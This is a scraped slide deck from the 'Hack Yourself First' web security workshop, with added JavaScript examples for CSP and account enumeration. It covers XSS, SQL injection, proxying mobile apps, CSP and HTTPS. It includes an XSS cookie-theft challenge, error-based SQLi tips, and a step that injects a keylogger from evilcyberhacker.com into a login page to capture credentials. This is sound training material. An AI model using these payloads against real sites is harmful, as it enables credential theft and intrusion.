Published by Ashlyn Woods. Modified over 9 years ago.
Hack Yourself First
Troy Hunt (@troyhunt, troyhunt.com, troyhunt@hotmail.com)
We’re gonna turn you into lean, mean hacking machines!
Because if we don’t, these kids are going to hack you:
- Jake Davies, 19 (and his mum)
- Ryan Cleary, 20 (and his mum)
- Curtis Gervais, 16, awaiting trial (probably with his mum)
Who are we protecting our assets from?
[Chart: hacker resources plotted against hacker competency]
- Super hackers: $10.8B per annum
- Common thieves: can invest where ROI makes sense
- Bored kids: pocket money
Your Hacker Tools for Today
- A Wi-Fi connection
- A mobile device you can configure a proxy on (I have a few spares)
- Google Chrome, or another browser with good dev tools
- Fiddler (getfiddler.com), or another HTTP proxy like charlesproxy.com
What we’ll be covering on day 1
09:00  Introduction (30 mins)
09:30  Discovering risks via the browser (30 mins)
10:00  Using an HTTP proxy (30 mins)
10:30  Break (15 mins)
10:45  XSS (50 mins)
11:35  SQL injection part 1 (55 mins)
12:30  Lunch (1 hour)
13:30  Mobile APIs (60 mins)
14:30  Content Security Policy (50 mins)
15:20  (untitled slot, 15 mins)
15:35  Account Enumeration (30 mins)
16:05  HTTPS (55 mins)
17:00  Close
Exercise 1 – Discovering risks via the browser
Exercise 1 – Chrome developer tools
- Familiarise yourself with the dev tools: Elements, Network, cookies, Console, por… uh, Incognito
- Create an account at hackyourselffirst.troyhunt.com
Hacker Challenge 1: Identify three security risks with the registration process
Exercise 2 – Using an HTTP proxy
- Familiarise yourself with Fiddler: watch requests and their headers, review response bodies and headers, and use the Composer to reissue a request
Hacker Challenge 2: Use Fiddler to vote multiple times on one car with your ID
Exercise 3 – Reflected cross-site scripting (XSS)
Understanding XSS
Server-side template:
    <p>You searched for <%= Request.QueryString["q"] %></p>
Request: mysite.com/?q=ferrari
Response: <p>You searched for ferrari</p>
Request: mysite.com/?q=<script>alert('Yay XSS!');</script>
Response: <p>You searched for <script>alert('Yay XSS!');</script></p>
Some quick XSS tips
- Check the encoding context: you encode for HTML differently than for JavaScript
- Check the encoding consistency: often it’s manual and some characters are not encoded
- Play with JavaScript to manipulate the DOM, access cookies, load external resources
Exercise 3 – XSS
- Establish the encoding practices on the search page: what’s encoded, what’s not, which contexts are encoding
- What can be accessed or manipulated in the DOM
Hacker Challenge 3: Create an XSS attack that sends the auth cookie to another site
Exercise 3 solution
');document.location='
Exercise 4 – SQL injection (SQLi)
Understanding SQLi
Server-side code:
    var query = "SELECT * FROM Widget WHERE Id = ";
    query += Request.Query["id"];
Request: mysite.com/?id=1
Query: SELECT * FROM Widget WHERE Id = 1
Request: mysite.com/?id=foo
Query: SELECT * FROM Widget WHERE Id = foo
Error: Invalid column name 'foo'
Because the value is concatenated unquoted, foo is parsed as a column name rather than a string, and the database’s error message is returned to the user; that error channel is what error-based SQLi exploits.
Some quick SQLi tips
- Think of SQL commands which disclose structure: sys.tables, sys.columns, system commands
- Consider how you’d enumerate through records: select the top x rows ascending, then the top 1 row from that set descending
- Write out how you think the query works internally, e.g. SELECT * FROM Supercar ORDER BY [URL param]
Exercise 4 – SQLi
Explore the database using error-based SQLi:
- Construct strings to disclose internal data
- Cast things to invalid types to disclose via exceptions (casting a string value such as the version to an integer fails, and the conversion error message echoes the value that would not convert)
Hacker Challenge 4: Discover the version of the DB
Exercise 4 solution: http://hackyourselffirst.troyhunt.com/Make/1
Exercise 5 – Mobile APIs

Understanding mobile APIs

Who are we protecting our APIs from?
[Diagram: HTTP(S) traffic between the app and the API, with attackers marked on the path]

Trusting the Fiddler root cert
Some quick mobile API tips
- Look at the HTTP requests for sensitive data: credentials, account info, PII
- Remove the proxy’s root cert and make HTTPS requests: is cert validation actually enabled in the app?
- In your own apps: parameter tampering, auth bypass, direct object references

Exercise 5 – Mobile APIs
- Proxy your device through Fiddler or Charles
- Inspect the traffic of your apps: perform normal activities and monitor requests
Hacker Challenge 5: Find three “things of interest” – doesn’t have to be security related
Exercise 6 – FiddlerScript

Understanding FiddlerScript
- Highlight particular request / response patterns
- Modify requests or responses in transit
- Good representation of what can be done with intercepted traffic
- Also great for causing apps to “misbehave”!

Some quick FiddlerScript tips
- Make good use of the FiddlerScript CookBook (Google it – first result)
- Wrap conditions around response parsing for better perf: host name / path / content type / method
- Don’t forget to hit the “Save Script” button! Plus debugging can be painful…

Exercise 6 – FiddlerScript
- Modify the traffic returned to your app
- Identify request / response patterns of an app
- Manipulate request / response to cause misbehaviour
Hacker Challenge 6: Proxy your mobile device and cause one of your apps to do something… “interesting”
Exercise 7 – Content Security Policy (CSP)

Without a CSP
- Anything can be added to the page via a reflected XSS risk
- Anything can be added to the DOM downstream of the server
- …and you have no idea when this one is happening!

With a CSP
- The browser will only load resources you white-list, local and remote
- Any violations can be reported
- If you’re nervous, you can always just report and not block (the Content-Security-Policy-Report-Only header)

Some quick CSP tips
- Create a white list of what should be allowed to run
- Start with nothing and see what breaks (in development!)
- Use the report feature to track exceptions: you’ll learn some interesting things…

Exercise 7 – CSP
Falafel needs help! They have no CSP and they’re a financial institution, and we can add one ourselves in transit.
Hacker Challenge 7: Write a CSP for a site and embed it using FiddlerScript

Injecting the CSP header (the host name and the policy value are left blank on the slide)
    static function OnBeforeResponse(oSession: Session) {
        if (oSession.HostnameIs("…")) {
            oSession.oResponse.headers["Content-Security-Policy"] = …;
        }
    }
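Before writing a policy for the challenge it helps to see how the browser applies one. The following is an added example (not from the slides and not Fiddler code): a small evaluator for CSP source expressions that shows how a white list is applied per directive, how directives fall back to default-src, what 'unsafe-inline' controls, and which header name gives you report-only mode. It is a deliberate simplification of the specification (no nonces, hashes, paths or 'strict-dynamic'), and the policy, origins and URLs in it are made up.

```javascript
// Added example (not from the slides): a simplified CSP source-expression
// evaluator. No nonces, hashes, paths or 'strict-dynamic'; policy, origins
// and URLs are made up.

function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) directives.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return directives;
}

const DEFAULT_PORT = { 'http:': '80', 'https:': '443' };

// Does one source expression permit loading `url` from a page at `pageOrigin`?
function sourceMatches(source, url, pageOrigin) {
  const target = new URL(url);
  const self = new URL(pageOrigin);
  const src = source.toLowerCase();
  if (src === "'self'") return target.origin === self.origin;
  if (src.startsWith("'")) return false;                 // 'none', 'unsafe-inline', ...
  if (src === '*') return true;                          // spec also excludes data:/blob:; ignored here
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return target.protocol === src;   // scheme-source, e.g. https:
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+|\*))?$/.exec(src);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  // Scheme: an explicit scheme must match; otherwise the page's scheme,
  // with http pages also allowed to load https resources.
  const schemes = scheme ? [scheme + ':']
    : (self.protocol === 'http:' ? ['http:', 'https:'] : [self.protocol]);
  if (!schemes.includes(target.protocol)) return false;
  // Host: exact match, or any subdomain for "*.host".
  const h = target.hostname.toLowerCase();
  if (wildcard ? !h.endsWith('.' + host) : h !== host) return false;
  // Port: an explicit port must match (the target's default port counts);
  // no port in the source means the scheme's default port.
  const targetPort = target.port || DEFAULT_PORT[target.protocol] || '';
  if (port === '*') return true;
  if (port) return targetPort === port;
  return target.port === '';
}

// Sources that govern a directive, honouring the default-src fallback.
function sourcesFor(directives, directive) {
  return directives.get(directive) || directives.get('default-src') || null;
}

function isAllowed(policy, directive, url, pageOrigin) {
  const sources = sourcesFor(parseCsp(policy), directive);
  if (sources === null) return true;   // no directive and no default-src: unrestricted
  return sources.some((s) => sourceMatches(s, url, pageOrigin));
}

// Inline <script>/<style> blocks, which is what a reflected XSS usually
// injects, need 'unsafe-inline' in the governing directive.
function inlineAllowed(policy, directive) {
  const sources = sourcesFor(parseCsp(policy), directive);
  return sources === null || sources.some((s) => s.toLowerCase() === "'unsafe-inline'");
}

// Header to set: report-only lets you watch violations without breaking anything.
function cspHeader(policy, reportOnly) {
  return [reportOnly ? 'Content-Security-Policy-Report-Only' : 'Content-Security-Policy', policy];
}

const bankPolicy =
  "default-src 'none'; script-src 'self' https://cdn.example.com; " +
  "img-src 'self' https:; style-src 'self' 'unsafe-inline'; report-uri /csp-report";
const page = 'https://bank.example';

console.log(cspHeader(bankPolicy, true));
console.log(isAllowed(bankPolicy, 'script-src', 'https://evil.example/x.js', page));   // false
console.log(isAllowed('', 'script-src', 'https://evil.example/x.js', page));           // true: no CSP
```

Starting from `default-src 'none'` means a directive you forgot (frame-src above) denies everything, which is the “start with nothing and see what breaks” approach; an empty policy lets the evil.example script through, which is the “without a CSP” slide in one line.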
Exercise 8 – HTTPS

Understanding HTTPS: confidentiality, integrity, authenticity

Some quick HTTPS tips
- Consider everything sent over HTTP to be compromised; sometimes that won’t matter… much
- Also look at HTTPS content embedded in untrusted pages: iframes, links to HTTPS

Exercise 8 – HTTPS
You can’t trust insecure login forms! The form can be manipulated in transit; manipulate it to capture the “secure” credentials in transit.
Hacker Challenge 8: Inject a JavaScript keylogger into an insecure login page using FiddlerScript

Injecting the keylogger
- Load evilcyberhacker.com/keylogger.js
- Set the “destination” JavaScript variable
Exercise 9 – Account enumeration

Understanding account enumeration
Does (address) have an account? No
Does (address) have an account? No
Does (address) have an account? Yes

Some quick account enumeration tips
- There are usually multiple vectors for identifying the existence of an account
- There may or may not be anti-automation defence, and it may be inconsistent across vectors
- It may or may not even matter… Very dependent on the nature

Exercise 9 – Account enumeration
- Identify vectors for account enumeration: think about how to “ask” the site about an account
- Identify positive versus negative responses
Hacker Challenge 9: Identify 3 sites you use that disclose the presence of your account
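As an added example (not from the slides), here is the “ask the site” step written out as a differential test: probe a vector with an address that cannot exist to learn what “no” looks like, then flag every candidate that is answered differently. The login and registration handlers are constructed stand-ins for a site’s endpoints, and they illustrate the inconsistency tip above: the login has been fixed to answer uniformly while registration on the same site still leaks. A real probe would issue HTTP requests and compare status, body and response time in the same way.

```javascript
// Added example (not from the slides): account enumeration as a differential
// test across vectors. Handlers, addresses and messages are constructed.

const registered = new Set(['alice@example.com', 'bob@example.com']);

// Leaky login: status and message depend on whether the account exists.
function loginLeaky(email) {
  if (!registered.has(email)) return { status: 404, body: 'No account exists for that email address' };
  return { status: 401, body: 'Incorrect password' };
}

// Fixed login: the same answer either way (the password is never right here).
function loginUniform() {
  return { status: 401, body: 'Invalid email address or password' };
}

// Registration on the same site still leaks: an inconsistent vector.
function registerLeaky(email) {
  if (registered.has(email)) return { status: 400, body: 'That email address is already registered' };
  return { status: 200, body: 'Check your inbox to confirm your address' };
}

// What we compare: in practice add response time and any redirect target.
function fingerprint(res) {
  return `${res.status}|${res.body}`;
}

// probe(email) -> response. Returns the candidates whose answer differs from
// the baseline produced by an address that cannot have an account.
function enumerateAccounts(probe, candidates) {
  const baseline = fingerprint(
    probe('no-such-user-' + Math.random().toString(36).slice(2) + '@invalid.example'));
  return candidates.filter((email) => fingerprint(probe(email)) !== baseline);
}

// Try every vector the site exposes; the weakest one decides whether accounts leak.
function enumerateAcrossVectors(vectors, candidates) {
  const found = {};
  for (const [name, probe] of Object.entries(vectors)) found[name] = enumerateAccounts(probe, candidates);
  return found;
}

const candidates = ['alice@example.com', 'carol@example.com', 'bob@example.com'];
console.log(enumerateAcrossVectors({ login: loginUniform, register: registerLeaky }, candidates));
```

Running it shows the login vector returning nothing and the registration vector returning alice and bob, which is why the challenge asks you to find the vectors rather than check the login page alone.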